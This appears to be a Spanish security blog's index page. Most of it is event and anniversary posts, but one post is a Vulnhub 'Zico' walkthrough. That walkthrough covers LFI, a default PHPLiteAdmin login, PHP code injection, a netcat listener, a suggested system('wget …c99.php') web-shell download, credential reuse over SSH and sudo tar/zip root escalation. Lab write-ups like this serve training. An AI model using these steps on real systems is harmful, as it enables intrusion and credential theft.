Esta entrada andaba dormida en el blog ya un año aproximadamente o quizás más fue cuando tuve la idea de realizar los informes de pentesting en LaTeX por cuestiones del destino, nunca pude implementar mas allá de una idea, y como andaba leyendo un poco @Krakakanok pregunto sobre reportes en LaTeX a lo cual recorde esta entrada y por ello la comparto, ya que se puede realizar informes de manera simple y rápida aun mas con los datos incluyendose directamente como anexos por ejemplo un escaneo de nmap, nikto y demás.


En el repositorio de Github se tiene todo lo necesario para formar un propio formato, ya que la base esta realizada para trabajar, recuerdo que lei algo sobre Pandoc para la generación de los documento de manera rápida ire viendo de sacarme tiempo para tenerlo en cuenta, ademas que ahora lo veo mas claro porque no realizar el informe de Elearn Security en LaTeX para presentar me tomaria mas tiempo la elaboración del mismo  no lo se ire viendo y comentando los avances.

Cuando son repositorios de importancia, o que me puedan servir en un futuro próximo trato de compartirlo en el blog, si conocen alguno que igual este realizado con LaTeX por favor compartan, que desde la elaboración de la tesis me enganche con ello. 

Si el presente trata de juzgar el pasado, perderá el futuro - Winston Churchill.

Regards,
Snifer

Leer Mas
Nuevamente con un nuevo reto de Vulnhub, despues de mucho tiempo sin estar rompiendo estos entornos en modo de práctica...



Los datos que nos brinda en la máquina virtual es el siguiente:

Description:
Zico is trying to build his website but is having some trouble in choosing what CMS to use. After some tries on a few popular ones, he decided to build his own. Was that a good idea?
Hint: Enumerate, enumerate, and enumerate!
Thanks to: VulnHub
Author: Rafael (@rafasantos5)

Doesn't work with VMware. Virtualbox only.


Lo primero que realizamos es identificar los equipos vivos con NMAP


Ya identificando el objetivo realizamos un barrido de puertos, con el fin de identificar las versiones exactas de los servicios que cuenta, y de esta manera proceder con nuestro objetivo, en este caso se identificaron dos puertos el 80 y 22 pertenecientes a HTTP y SSH

Lo primero que corresponde en este caso es acceder al servicio web y ver que tenemos corriendo


Desde hace un par de años aproximadamente considero como mi herramienta principal en aplicaciones WEB a Burp Suite, una de las primeras tareas es la ejecucion del crawler para realizar el reconocimiento y descubrimiento de directorios. Identificando el siguiente parámetro /view.php?page= se veia un buen LFI Local File Inclusion, debido a que tiene como referencia a un fichero html que es tools.html.


El siguiente paso que realize como PoC es acceder al index.html quedando de la siguiente manera /view.php?page=index.html viendo que era existoso se llego a obtener el fichero passwd, como tenemos a continuación.


OJO PIOJO: En esta etapa tambien es posible utilizar Fuzzing - JHADDIX_LFI.txt para realizar un fuzzing directamente y ver si obtenemos algun dato importante.


El siguiente paso es tratar de identificar algun fichero que nos sirva para obtener información sensible como ser un config.php, db-config.php e incluso algun backup que ande suelte en la web, para eso procedemos a ejecutar un reconocimiento de directorios, y como era de esperar utilizare el intruder de Burp Suite, con el diccionario de dirb common.txt como se muestra a continuación. 

Configuración en el request

ATENCIÓN: Considera que es posible realizar este mismo proceso con Discover Content de BurpSuite o bien con DIRB, Dirbuster para identificar directorios, y el uso del INTRUDER es únicamente mi punto de vista y mi manera de trabajar con BurpSuite,



Si vemos el resultado lo que llama la atención son los 200 y 301 y en especial el dbadmin, una vez ingresando por el navegador tenemos un test_db.php.




Al acceder tenemos el login de PHPLiteAdmin, y un formulario de Login que únicamente nos pide un usuario en este punto lo que se realizo fue de manera automática ingresar admin ya que es lo primero que siempre intento y vaya sorpresa que el resultado fue exitoso.



TIP - Sugerencia: Lo que debes de tener en cuenta cuando en un entorno real, es buscar en internet contraseñas por defecto muchas veces no se cambia o se deja como viene de fábrica.


El siguiente paso es identificar si esta versión de PHPLiteAdmin cuenta con alguna vulnerabilidad como vimos anteriormente en el blog, usamos SearchSploit para ver si se tiene alguna vulnerabilidad y vaya sorpresa evidentemente la versión actual es vulnerable.



Si vemos la especificación del mismo nos indica que nos permite crear una base de datos y con ella al crear una tabla con datos adicionales llegamos a realizar una inyección de Código.

Primero para verificar unicamente llamos un phpinfo() y vemos que si es posible explotar.



Si vemos a continuación daremos uso al LFI identificado con anterioridad, al momento de crear la base de datos tenemos el directorio, /usr/databases/ al acceder tenemos la información respectiva de PHP.



El siguiente paso es realizar un reverse Shell con PHP, como vemos en la siguiente captura se tiene el código


En este caso usare netcat para estar a la escucha con el comando:

nc -lvp 443


PIENSA DIFERENTE: Esta manera de explotar que realize con PHP y ejecutar una shell reversa, puede tener diferentes variantes como ser la descarga de una Shell desde un Servidor system("wget -c http://c99.php") o bien crear una con Metasploit, weevely e incluso llamando a un NETCAT, el límite a esto lo pone tu imaginación.

En los comentarios que nos brinda, la máquina nos dice claramente que la clave esta en el reconocimiento por lo tanto me dispuse a navegar con la terminal entre los diferentes directorios del servidor, hasta que llegue a home/zico al ingresar veo que existe un to_do.txt.


Tras navegar entre los directorios de wordpress y Joomla se identifico en el wordpress el fichero de configuración. wp-config.php.


El resultado del mismo es el siguiente, donde tenemos un usuario y contraseña en este punto para que nos puede servir?, recuerdan el SSH porque no intentar y ver si llegamos a acceder, el resultado del mismo es exitoso, pero como vemos a continuación aun no tenemos root en el servidor, para ello ejecutamos sudo -l y verificamos si esta debidamente configurado el SUDO.


Se ve que tenemos como root dos opciones para ejecutar tar y zip y no pide la contraseña, asi que tras revisar un poco identifique el siguiente gist en el cual se explica como obtener una shell con tar y zip respectivamente.


Una ves logrado se tiene acceso de root y por lo tanto accedemos a la flag.txt, tenemos también la opción de hacer un reconocimiento de la versión del Kernel por ejemplo y proceder a escalar privilegios https://www.exploit-db.com/exploits/26131/

Recién estos dias aprendí a llegar a obtener shells por medio de las BAD sudo config gracias a Monr4 por la explicación que tuvo, esta es la primera vez que llego a escalar privilegios de esta manera, algo que tenia como pendiente aprenderlo y ahora ya creo que voy afianzando mis conocimientos aun mas. Durante el proceso de la elaboración de la máquina virtual bueno resolución, el tiempo que me tomo en resolver la máquina fue de 1:30 minutos ya que andaba varado en este punto de escalar privilegios.

"Toda lectura debe ir acompañada de meditación, es la única manera de encontrar en los libros lo que otros no supieron hallar en ellos" Levay


Regards,
Snifer
Leer Mas
Se viene en un par de semanas el OWASP DAY LA PAZ, como comente anteriormente andare retornando y compartiendo con la comunidad nuevamente como lo hacia hace un par de años atras, y por ello espero estar presente el 8 y 9 de Diciembre en el Owasp Day a realizarse en la ciudad de La Paz en la UMSS. Pero por ahora se tiene unicamente el CFP Call for Papers , y en el idioma de Cervantes conocido como LLamado a los speakers!! (No hagas caso a mi ingles loco).

A continuación comparto el enlace respectivo para el que se anime a mandar una charla donde puede estar compartiendo por 25 o 45 minutos, por mi parte estare presente el día 9  Sábado, espero encontrarme con alguno y desvirtualizarlo vere de tener stickers de SniferL4bs o el Dino para ese día, recordarles que  el mes de Octubre se tuvo el OWASP Day en Cochabamba, además de contar en Abril con el OWASP LATAM Tour. 

La charla que actualmente esta confirmada es Ricardo Berrospi desde Perú.

https://pbs.twimg.com/media/DOTvFrqWsAAz4XP.jpg

La charla que mande como propuesta es #Bashert el desarrollo de mi herramienta que tiene como objetivo automatizar las tareas de pentesting que realizo en el dia a dia.


"La vida no es esperar a que pase la tormenta, sino salir a bailar bajo la lluvia" Daisaku Ikeda.


Regards,
Snifer
Leer Mas
El pasado mes de Octubre se tuvo en La Paz Bolivia el evento 8.8 Lucky en el cual tuve el placer de formar parte de la organización, va desde el 2012 aproximadamente que no andaba detrás de organizar un evento de seguridad informática ya que me agrada meterme en el mambo a pesar de ser un peso extra pero la satisfacción de que se realize es bastante.


Tuve la oportunidad de conocer a grandes ponentes compartir un momento en el break, o almuerzo lo cual me llevo a querer superarme aun más, e impulsar un poco el blog y todos los proyectos que se tienen, como nota anecdotaria del evento es que al fin despues de 4 años, como se tiene en la siguiente entrada Al fin llego el libro de NMAP, llego a firmar el libro, teniendo el placer de desvirtualizar a @calderpwn, ademas de regalarme un protector para la laptop de WebSec que anda ya acompañandome con la laptop de la oficina.


Las charlas que se tuvieron fueron las siguientes, dar las gracias a todos los speakers que tuve el gusto de conocerlos y disfrutar un poco los dos días.


El segundo día del evento, se tuvo una baja médica de uno de los speakers por lo cual se me ocurrio temprano poder dar una charla corta, con la intención para no hacer esperar a los asistentes tanto tiempo, comente con la organización  y mi sorpresa fue grata, ya que me dieron luz verder para hacerlo, la misma fue como afrontar un CTF dar a conocer en que consiste los tipos que existe y cual es su objetivo de ellos además de explicar un poco sobre los retos que se dieron en Facebook y Twitter para ganarse una entrada para estar en el evento.


Si era yo, el que realizo los retos, así que si desean...




Les dejo en el siguiente enlace la presentación por si alguno de los que lee el blog estuvo presente en el evento fue la presentación mas rápida que arme y además de entretenida, desde aqui dar las gracias a la organización de la 8.8 Bolivia por permitirme formar parte del evento y apoyar, al año estaremos presentes dando una charla, que por cierto en estos días iremos moviendo mas el ambiente. 



"Hay una fuerza motriz más poderosa que el vapor, la electricidad y la energía atómica…La voluntad." Albert Einstein


Regards,
Snifer
Leer Mas
Hace 7 años que inicio este viaje, de crear un blog totalmente personal y tenerlo como referencia, un pequeño espacio al cual podría consultar cada X tiempo, lo que llegue a escribir...


Al comienzo de todo, lo tenía como un diario de las cosillas que vaya aprendiendo en la Universidad y esos pasos que daba en el mundo de la seguridad informática, en realidad lo que molestaba y usaba como conejillo de Indias a los compañeros de la U especificamente cuando me mude a Cochabamba,de a poco fui animándome a realizar entradas de Informática o Linux.


El título es 6 años y en el contenido menciono 7 años, quizas no todos saben pero el primer año que estuvo online el blog fue dado de baja sin previo aviso y como se dice "En casa de Herrero, cuchillo de palo" no tenía un Backup, a partir de ese incidente  cada semana llego a sacar el backup del Blog.

http://2.bp.blogspot.com/-O_-higkMNAo/TojIbOiyC4I/AAAAAAAAAAQ/QXZnNAuPISQ/s320/Pantallazo.png

El aniversario fue hace un mes, exactamente en Octubre, por cuestiones temporales del multiverso, pasó el tiempo sin darme cuenta, y hoy quiero darles las gracias a todos por dejar y permitir que Jose Moruno aka Snifer pueda compartir sus experiencias en el mundo que lo apasiona. En todo este tiempo del blog, noto y note un cambio completo y total por la forma de escribir que viendo entradas de ante año y ahora mejore bastante, considerando que aún hay cosas que mejorar pero vamos por buen camino, las entradas cambiaron bastante en este tiempo al inicio era entradas de Linux y algo desarrollo pasando cuando tenia tiempo a escribir algo de hacking. 

Ver atras en el tiempo y ver al muchacho que andaba en la Universidad soñando con trabajar en Seguridad Informática, dedicarse cada dia a ello, solo le digo que si es posible soñar, todo esfuerzo vale la pena, cada caida tropiezo solo sirve para hacer que uno sea mas fuerte.


Este año no compartire el status de entradas, visitas y demás lo veo innecesario... Lo que si les quiero compartir son los próximos proyectos en el Blog y los que seguiremos creando, a pesar de todo esta inactividad que tuvimos que sirvieron para afianzar y mejorar en esto que a todos nos apasiona la Seguridad Informática.

Como siempre trato de mantener el Canal en Youtube que el año pasado iniciamos lo que es Dame una Shell en formato Podcast el mismo desde el mes de Octubre que deje de grabar mas que todo por no sacar el tiempo necesario para crear material y contenido, pero bueno contenido si hay, lo que falta es el impulso de sentarme y ponerme a grabar los mismos, respecto a los Hangout que espero retomarlos pronto y ver como realizarlo de una manera mas amena posible.

El podcast lo subimos a Ivoox en el cual lo tienen al lado derecho, para que se suscriban o lo tengan agregado a sus feeds, ahi vamos subiendo tanto los Hangouts como los Podcast.



Cualquier mejora que puedan mencionar ante ambos proyectos no duden en hacerlo que es para una mejora continua e ir creciendo.

Tambien comentarles que se retomara en el grupo de Telegram HackySec que pertence al proyecto de SniferL4bs, la realización de solucionarios de Máquinas de Vulnhub en el siguiente enlace podrán tener el desglose del proyecto por decirlo así y lo que se desea realizar.

Respecto a videos a realizar anda en mente, tener algunos Paso a Paso de como resolver las máquinas virtuales, a pesar de que se tenga el mismo en una entrada especificando todo el proceso que se tuvo veremos como avanza esta idea y si llega a madura, espero si tienen alguna idea referente a que temas a tratar lo digan en los comentarios o bien por Twitter, Telegram.



En fin gracias por leerme y nos vemos mañana con una nueva entrada en el blog.

Related image

"Con orden y tiempo se encuentra el secreto de hacerlo todo, y de hacerlo bien." Pitágoras

Regards,
Snifer
Leer Mas